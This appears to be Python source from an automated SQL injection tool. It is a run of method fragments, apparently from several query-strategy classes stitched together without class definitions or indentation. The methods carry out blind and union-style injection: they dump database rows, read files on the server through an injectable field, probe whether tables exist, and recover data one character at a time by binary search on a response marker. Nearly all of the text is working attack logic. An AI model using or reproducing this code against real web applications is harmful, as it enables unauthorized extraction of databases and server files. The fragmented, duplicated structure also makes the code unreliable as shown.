def read_file(self, mole, filename, injectable_field):
mole.stop_query = False
query = mole._dbms_mole.read_file_integer_len_query(filename, injectable_field)
try:
req = mole.make_request(query)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
length = mole._dbms_mole.parse_results(req)
if length is None or len(length) == 0:
return ''
length = int(length[0])
sqli_output = output_manager.blind_output(length)
query_gen = lambda index, offset: mole._dbms_mole.read_file_integer_query(index,
filename,
injectable_field)
query_item_gen = lambda x: self._generic_integer_query_item(mole,
query_gen,
x,
0,
sqli_output)
data = ''.join(mole.threader.execute(length, query_item_gen))
sqli_output.finish()
data = data.split(mole._dbms_mole.blind_field_delimiter())
if not data or len(data) != 1:
raise QueryError('Query did not generate any output.')
else:
return data[0]
def _generic_query(self, mole,
count_query,
query_generator,
result_parser=lambda x: x[0],
start=0, limit=0x7fffffff):
try:
req = mole.make_request(count_query)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
result = mole._dbms_mole.parse_results(req)
if not result or len(result) != 1:
raise QueryError('Count query failed.')
else:
count = int(result[0])
if count == 0:
return []
count = min(count, limit + start)
if start >= count:
return []
output_manager.advance('Rows: {0}'.format(count)).line_break()
rows_done = output_manager.row_done_counter(count)
dump_result = []
mole.stop_query = False
gen_query_item = lambda i: self._generic_query_item(mole, query_generator, i, rows_done, result_parser)
dump_result = mole.threader.execute(count - start, gen_query_item)
dump_result.sort()
return dump_result
def _generic_blind_len(self, mole, count_fun, trying_msg, max_msg, print_stats=True):
last = 1
while True and not mole.stop_query:
try:
req = mole.make_request(count_fun('>', last))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
if print_stats:
output_manager.info(trying_msg(last))
if mole.needle in req:
break;
last *= 2
if print_stats:
output_manager.info(max_msg(last))
pri = last // 2
while pri < last:
if mole.stop_query:
return pri
medio = ((pri + last) // 2) + ((pri + last) & 1)
try:
req = mole.make_request(count_fun('<', medio - 1))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
if mole.needle in req:
pri = medio
else:
last = medio - 1
return pri
def get_dbinfo(self, mole, injectable_field):
query = mole._dbms_mole.dbinfo_query(injectable_field)
req = mole.make_request(query)
try:
data = mole._dbms_mole.parse_results(req)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
if not data or len(data) != 3:
raise QueryError('Query did not generate any output.')
else:
return data
def _generic_integer_query_item(self, mole, query_generator, index, offset, sqli_output):
if mole.stop_query:
return None
try:
req = mole.make_request(query_generator(index + 1, offset=offset))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
result = mole._dbms_mole.parse_results(req)
if not result or len(result) < 1:
raise QueryError('Query did not generate any output.')
else:
result = chr(int(result[0]))
sqli_output.set(result, index)
return result
def _blind_query_character(self, mole, query_fun, index, offset, output=None):
pri = ord(' ')
last = 126
index = index + 1
while True:
if mole.stop_query:
return None
medio = (pri + last) // 2
try:
response = mole.requester.request(
mole.generate_url(query_fun(index, medio, offset))
)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
if mole.needle in response:
pri = medio + 1
else:
last = medio
if medio == last - 1:
output.set(chr(medio + 1), index - 1)
return chr(medio + 1)
else:
if pri == last:
output.set(chr(medio), index - 1)
return chr(medio)
else:
output.set(chr(medio), index - 1)
def read_file(self, mole, filename, injectable_field):
query = mole._dbms_mole.read_file_query(filename, injectable_field)
try:
req = mole.make_request(query)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
result = mole._dbms_mole.parse_results(req)
return result[0] if not result is None else ''
def table_exists(self, mole, db, table, injectable_field):
try:
req = mole.make_request(
mole._dbms_mole.fields_integer_count_query(
db, table, injectable_field))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
return not mole._dbms_mole.parse_results(req) is None
def get_dbinfo(self, mole, injectable_field):
count_fun = None
length_fun = lambda x: lambda y, z: mole._dbms_mole.dbinfo_blind_len_query(y, z)
query_fun = lambda x, y, z: mole._dbms_mole.dbinfo_blind_data_query(x, y)
data = self._blind_query(mole, count_fun, length_fun, query_fun, row_count=1)
if len(data) != 1 or len(data[0]) != 3:
raise QueryError('Query did not generate any output.')
return [data[0][0], data[0][1], data[0][2]]
def _generic_query_item(self, mole,
query_generator,
offset,
rows_done_counter,
result_parser=lambda x: x[0]):
if mole.stop_query:
return None
try:
req = mole.make_request(query_generator(offset))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
result = mole._dbms_mole.parse_results(req)
if not result or len(result) < 1:
raise QueryError('Query did not generate any output.')
else:
rows_done_counter.increment()
return result_parser(result)
def _generic_integer_query(self,
mole,
count_query,
length_query,
query_generator,
result_parser=lambda x: x[0],
start=0,
limit=0x7fffffff):
try:
req = mole.make_request(count_query)
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
result = mole._dbms_mole.parse_results(req)
if not result:
raise QueryError('Count query failed.')
else:
count = int(result[0])
if count == 0:
return []
count = min(count, limit + start)
output_manager.advance('Rows: {0}'.format(count)).line_break()
dump_result = []
mole.stop_query = False
for i in range(start, count):
if mole.stop_query:
break
try:
req = mole.make_request(length_query(i))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
length = mole._dbms_mole.parse_results(req)
if length is None:
break
length = int(length[0])
sqli_output = output_manager.blind_output(length)
gen_query_item = lambda x: self._generic_integer_query_item(
mole, query_generator, x, i, sqli_output)
dump_result.append(''.join(
mole.threader.execute(length, gen_query_item)))
if not mole.stop_query:
sqli_output.finish()
dump_result.sort()
return dump_result
def table_exists(self, mole, db, table, injectable_field):
try:
req = mole.make_request(
mole._dbms_mole.fields_blind_count_query('>',
100000000,
db=db,
table=table))
except ConnectionException as ex:
raise QueryError('Connection Error: (' + str(ex) + ')')
return mole.analyser.is_valid(req)